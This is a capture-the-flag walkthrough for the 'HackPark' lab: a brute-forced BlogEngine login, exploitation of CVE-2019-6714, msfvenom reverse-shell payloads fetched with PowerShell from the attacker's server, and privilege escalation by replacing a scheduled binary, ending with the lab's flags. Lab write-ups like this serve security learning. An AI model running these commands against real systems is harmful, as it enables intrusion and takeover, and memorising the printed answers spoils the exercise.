HackPark

Click here if you’re interested in the room!

This guide is meant to be used as a supplement for learning, please tackle this on your own before reading this!

What’s the name of the clown displayed on the homepage?
What request type is the Windows website login form using?
Guess a username, choose a password wordlist and gain credentials to a user account!
Now you have logged into the website, are you able to identify the version of the BlogEngine?
What is the CVE?
Using the public exploit, gain initial access to the server. Who is the webserver running as?
Generating a reverse-shell payload using msfvenom (naming mine hello.exe)
What is the OS version of this windows machine?
What is the name of the abnormal service running?
What is the name of the binary you’re supposed to exploit?
What was the Original Install time? (This is date and time)

1) What’s the name of the clown displayed on the homepage?

pennywise

POST

3) Guess a username, choose a passwordlist and gain credentials to a user account!

From the hints we can see that username is admin, and we will be using the infamous rockyou.txt as the password list.

Using BurpSuite to intercept we can see the post form and the body of the post form.

login: admin
password: 1qaz2wsx

4) Now you have logged into the website, are you able to identify the version of the BlogEngine?

Scrolling down to the About tab on the left we can identify the version.

3.3.6.0

5) What is the CVE?

Now we have to gain access to the machine using a reverse shell, but we can look for a vulnerability on www.exploit-db.com and searching “BlogEngine”

We found what we’re looking for.

CVE-2019-6714

6) Using the public exploit, gain initial access to the server. Who is the webserver running as?

Go to Content -> Posts -> Welcome to HackPark

Upload PostView.ascx

Setup a nc listener on your chosen port.

nc -lvnp 4444

After, go to

http://{target_ip}/?theme=../../App_Data/files

iis apppool\blog

Time to pivot from netcat to meterpreter for a more full-fleshed shell.

7) Generating a reverse-shell payload using msfvenom (naming mine hello.exe)

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST={your_ip} LPORT={your port} -f exe -o hello.exe

Setup a http server and download the payload.

python3 -m http.server

First, navigate to C:\Windows\Temp

Download the payload.

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/hello.exe','hello.exe')"

Setup metasploit

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT {your port}
set LHOST {your ip}
run

Start Process

powershell "Start-Process 'hello.exe'"

We now have a meterpreter session!

8) What is the OS version of this windows machine?

Windows 2012 R2 (6.3 Build 9600)

I’m going to be further enumerating the machine using winPEAS.

upload winPEAS.bat
shell
winPEAS.bat

9) What is the name of the abnormal service running?

I see something interesting

WindowsScheduler

10) What is the name of the binary you’re supposed to exploit?

Navigating to “C:\Program Files (x86)\SystemScheduler\events

Taking a look glance at all the .txt files I see something that sticks out:

Message.exe seems to be running approximately every 30 seconds as admin.

Message.exe

Let’s run our own payload abusing this fact.

Spawn a msfvenom payload called Message.exe

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST={your_ip} LPORT={your_port} -f exe -o Message.exe

Setup another meterpreter session or a nc session.

Go to “C:\Program Files (x86)\SystemScheduler” and overwrite Message.exe

After a few seconds we should be connected:

I’m in metasploit so to search for text files

search -f *.txt

cat "c:\Users\jeff\Desktop\user.txt"
cat "c:\Users\Administrator\Desktop\root.txt"

FLAG for Jeff 759bd8af507517bcfaede78a21a73e39

FLAG for Root 7e13d97f05f7ceb9881a3eb3d78d3e72

11) What was the Original Install Time?

Spawn a regular shell from meterpreter session then use the command systeminfo to find the time.

shell
systeminfo

8/3/2019 10:43:23